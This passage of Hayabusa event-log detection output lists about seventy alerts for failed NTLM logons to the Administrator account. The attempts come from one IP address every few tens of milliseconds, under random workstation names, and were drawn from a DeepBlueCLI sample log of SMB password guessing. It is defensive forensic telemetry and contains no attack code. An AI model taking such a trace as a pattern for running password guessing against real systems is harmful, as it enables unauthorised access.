| 1566 | 2016-09-20 01:50:47.445 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PwZLRPFxaFWwjZEe : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1567 | 2016-09-20 01:50:47.500 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8fXgFFb3HTMunsoi : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1568 | 2016-09-20 01:50:47.549 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: R1RozAr1uhux4cYW : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1569 | 2016-09-20 01:50:47.586 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: n7EmuUSv03RnhKsF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1570 | 2016-09-20 01:50:47.629 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: jw410HEW8EC3MC9f : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1571 | 2016-09-20 01:50:47.680 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: UTYp8cEbt3Yggo3J : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1572 | 2016-09-20 01:50:47.727 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: yWJVzgYLWIo7SGCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1573 | 2016-09-20 01:50:47.773 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: DP13jPdW5Gdl8z56 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1574 | 2016-09-20 01:50:47.813 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: LNXOWjHmMDhfFVon : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1575 | 2016-09-20 01:50:47.908 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: kka1RiF3f7Nhkf8x : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1576 | 2016-09-20 01:50:47.959 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 2o90lG6attzWU4ZN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1577 | 2016-09-20 01:50:47.998 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PyPK9kuJdflQ4RKe : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1578 | 2016-09-20 01:50:48.028 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: a9I3El7d7anR0kIz : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1579 | 2016-09-20 01:50:48.068 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: eDUMTEfNhFuuqMle : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1580 | 2016-09-20 01:50:48.110 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: e0F70d1WstkqnQgA : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1581 | 2016-09-20 01:50:48.148 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Bm0txApQSp1U42N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1582 | 2016-09-20 01:50:48.180 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: JeEe5ENSIZnfc3FG : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1583 | 2016-09-20 01:50:48.228 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: oasE54Z1FlpswY0d : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1584 | 2016-09-20 01:50:48.277 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Bhje1BgvxOlG28JM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1585 | 2016-09-20 01:50:48.321 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: L9iTIv4UQ4En9RA2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1586 | 2016-09-20 01:50:48.356 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Mg8KFm1lCeImj8Sb : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1587 | 2016-09-20 01:50:48.400 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: h17Fz1s6GJki61jg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1588 | 2016-09-20 01:50:48.440 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 6Pjjn4FAkJn4h32r : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1589 | 2016-09-20 01:50:48.483 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ARVx3FAAww8Gmfvc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1590 | 2016-09-20 01:50:48.533 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: sYIwPg5k1wpvWobN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1591 | 2016-09-20 01:50:48.572 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 0sfhYQ54SjC4JTX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1592 | 2016-09-20 01:50:48.604 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: nfZYnUPV40FShcqt : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1593 | 2016-09-20 01:50:48.648 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XYbvWVCT0tFixZTH : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1594 | 2016-09-20 01:50:48.696 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XC6Vmz0ql8myDuGa : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1595 | 2016-09-20 01:50:48.744 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PJ8JvuvZZzwSOzFo : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1596 | 2016-09-20 01:50:48.784 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: s06yKaogI6FYkXla : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1597 | 2016-09-20 01:50:48.828 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: pCjOc7PguxwNKoQR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1598 | 2016-09-20 01:50:48.876 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BX5IosnpdYZK5xZj : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1599 | 2016-09-20 01:50:48.905 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gfMjB1epEm64wVEX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1600 | 2016-09-20 01:50:48.947 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: pb4FVO2SKsoMyt1K : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1601 | 2016-09-20 01:50:49.003 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 1qoRw2jjFx4F6Wx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1602 | 2016-09-20 01:50:49.048 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ImiLeiteLoSw32I0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1603 | 2016-09-20 01:50:49.083 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KcIYD47BIEP8gB0L : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1604 | 2016-09-20 01:50:49.120 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: lUAeB15aWamcaZ8L : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1605 | 2016-09-20 01:50:49.161 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KFOKiSDWc1dWjzge : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1606 | 2016-09-20 01:50:49.211 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: hqyMtzjKSJEtEAdx : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1607 | 2016-09-20 01:50:49.251 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: WtHsItpyFHQxvLWm : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1608 | 2016-09-20 01:50:49.287 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: RdGMqIhUGHj23Xm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1609 | 2016-09-20 01:50:49.328 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BfE5LVmrPaAFLwBR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1610 | 2016-09-20 01:50:49.368 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: b1swKSla5gkdOwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1611 | 2016-09-20 01:50:49.408 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: kL9MdVnRVogiP7hF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1612 | 2016-09-20 01:50:49.456 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aQ0hRdwZvC5PBcXl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1613 | 2016-09-20 01:50:49.497 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ctbv73J0Dot9raD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1614 | 2016-09-20 01:50:49.544 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wKpWApJIKkjbtaPB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1615 | 2016-09-20 01:50:49.590 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: kVTAv9VoNpUyxQFM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1616 | 2016-09-20 01:50:49.642 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xb3t1dpuk9JZri5p : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1617 | 2016-09-20 01:50:49.688 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: fy0UrW8TWrxAOX90 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1618 | 2016-09-20 01:50:49.733 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: iUXUbUsiE6Ahh9iD : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1619 | 2016-09-20 01:50:49.776 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 2QQdQ6rQYLBf15AF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1620 | 2016-09-20 01:50:49.820 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zG4eJLuQ4u2dKQG0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1621 | 2016-09-20 01:50:49.854 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QCfwHs2gVGiRc3Fy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1622 | 2016-09-20 01:50:49.897 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 67TcwQfTxgTtQvCU : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1623 | 2016-09-20 01:50:49.945 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: imnSPKAKYzrCKSUf : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1624 | 2016-09-20 01:50:50.024 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: mMNbdjiXNUY0gTfB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1625 | 2016-09-20 01:50:50.068 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zOAH0gjfs8JcXSMO : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1626 | 2016-09-20 01:50:50.117 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: TnnB4KPBiDvKMsUL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1627 | 2016-09-20 01:50:50.153 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 0aZRgpa5riqIEWhQ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1628 | 2016-09-20 01:50:50.198 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BBL4nrs7f6cjlfsT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1629 | 2016-09-20 01:50:50.247 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: fgDupzqipe5jK0r5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1630 | 2016-09-20 01:50:50.280 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5yPcTOWPuN8efJtl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1631 | 2016-09-20 01:50:50.320 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Dszb6s0w6glvSkSw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1632 | 2016-09-20 01:50:50.357 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ynu936pVVAuDUGT5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1633 | 2016-09-20 01:50:50.407 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: c55o3Dca2tiUVwb2 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1634 | 2016-09-20 01:50:50.444 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: tnDmp2KK02LyJ7Xm : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1635 | 2016-09-20 01:50:50.499 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xRUKrHDAmgEPcjQw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
